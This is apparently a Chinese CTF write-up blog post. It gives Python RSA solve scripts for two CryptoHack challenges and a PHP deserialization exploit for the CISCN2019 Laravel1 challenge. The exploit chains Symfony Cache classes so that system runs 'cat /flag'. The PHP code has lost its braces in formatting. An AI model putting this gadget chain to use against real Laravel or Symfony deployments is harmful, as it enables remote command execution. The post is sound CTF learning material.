cryptohack wp day(10)

Posted 2023-05-13 Cryglz

Inferius Prime

能分解n

p= 986369682585281993933185289261
q= 752708788837165590355094155871

e=3

c=39207274348578481322317340648475596807303160111338236677373


n=p*q
fn=(p-1)*(q-1)
print(n)
print(fn)
import libnum
import gmpy2
import sympy
d=gmpy2.invert(e,fn)
print("d=",d)
flag=int(pow(c,d,n))
print(\'flag=\',flag)
print(libnum.n2s(flag))
print(sympy.nextprime(d))

Square Eyes

import gmpy2
import libnum
n = 535860808044009550029177135708168016201451343147313565371014459027743491739422885443084705720731409713775527993719682583669164873806842043288439828071789970694759080842162253955259590552283047728782812946845160334801782088068154453021936721710269050985805054692096738777321796153384024897615594493453068138341203673749514094546000253631902991617197847584519694152122765406982133526594928685232381934742152195861380221224370858128736975959176861651044370378539093990198336298572944512738570839396588590096813217791191895941380464803377602779240663133834952329316862399581950590588006371221334128215409197603236942597674756728212232134056562716399155080108881105952768189193728827484667349378091100068224404684701674782399200373192433062767622841264055426035349769018117299620554803902490432339600566432246795818167460916180647394169157647245603555692735630862148715428791242764799469896924753470539857080767170052783918273180304835318388177089674231640910337743789750979216202573226794240332797892868276309400253925932223895530714169648116569013581643192341931800785254715083294526325980247219218364118877864892068185905587410977152737936310734712276956663192182487672474651103240004173381041237906849437490609652395748868434296753449
e = 65537
ct = 222502885974182429500948389840563415291534726891354573907329512556439632810921927905220486727807436668035929302442754225952786602492250448020341217733646472982286222338860566076161977786095675944552232391481278782019346283900959677167026636830252067048759720251671811058647569724495547940966885025629807079171218371644528053562232396674283745310132242492367274184667845174514466834132589971388067076980563188513333661165819462428837210575342101036356974189393390097403614434491507672459254969638032776897417674577487775755539964915035731988499983726435005007850876000232292458554577437739427313453671492956668188219600633325930981748162455965093222648173134777571527681591366164711307355510889316052064146089646772869610726671696699221157985834325663661400034831442431209123478778078255846830522226390964119818784903330200488705212765569163495571851459355520398928214206285080883954881888668509262455490889283862560453598662919522224935145694435885396500780651530829377030371611921181207362217397805303962112100190783763061909945889717878397740711340114311597934724670601992737526668932871436226135393872881664511222789565256059138002651403875484920711316522536260604255269532161594824301047729082877262812899724246757871448545439896
p = gmpy2.iroot(n,2)[0]
print(p)
phi = p*(p-1)
d = gmpy2.invert(e,phi)
flag =pow(ct,d,n)
print(bytes.fromhex(hex(flag)[2:]))
print(libnum.n2s(int(flag)))

[CISCN2019 总决赛 Day1 Web4]Laravel1

[CISCN2019 总决赛 Day1 Web4]Laravel1

界面如上，比较单一：

指出了反序列化的点：还有备份文件。

下面反序列化的入口：
就当找到了吧：
确实可以跳转：
可控：
寻找这个类，看是否被调用：

开始寻找使用了saveDeferred类的：

看别人的WP这个是唯一可以使用的:

调用了本类的initialise方法，但前文并没有定义，据其他WP说是会去父类找,

偷一张其继承关系的图：
查询得到其主要父类，尝试全局搜索initialise()

include可以使用：
那么在之前的那个PhpArrayAdapter.php中定义好$this->file,只要其存在就能包含出来：

贴exp:

<?php

namespace Symfony\\Component\\Cache\\Adapter;

class TagAwareAdapter
    public $deferred = array();
    function __construct($x)
        $this->pool = $x;
    


class ProxyAdapter
    protected $setInnerItem = 'system';


namespace Symfony\\Component\\Cache;

class CacheItem
    protected $innerItem = 'cat /flag';


$a = new \\Symfony\\Component\\Cache\\Adapter\\TagAwareAdapter(new \\Symfony\\Component\\Cache\\Adapter\\ProxyAdapter());
$a->deferred = array('aa'=>new \\Symfony\\Component\\Cache\\CacheItem);
echo urlencode(serialize($a));

使用：

还有问题未解决，等待了解：理解的太浅显了：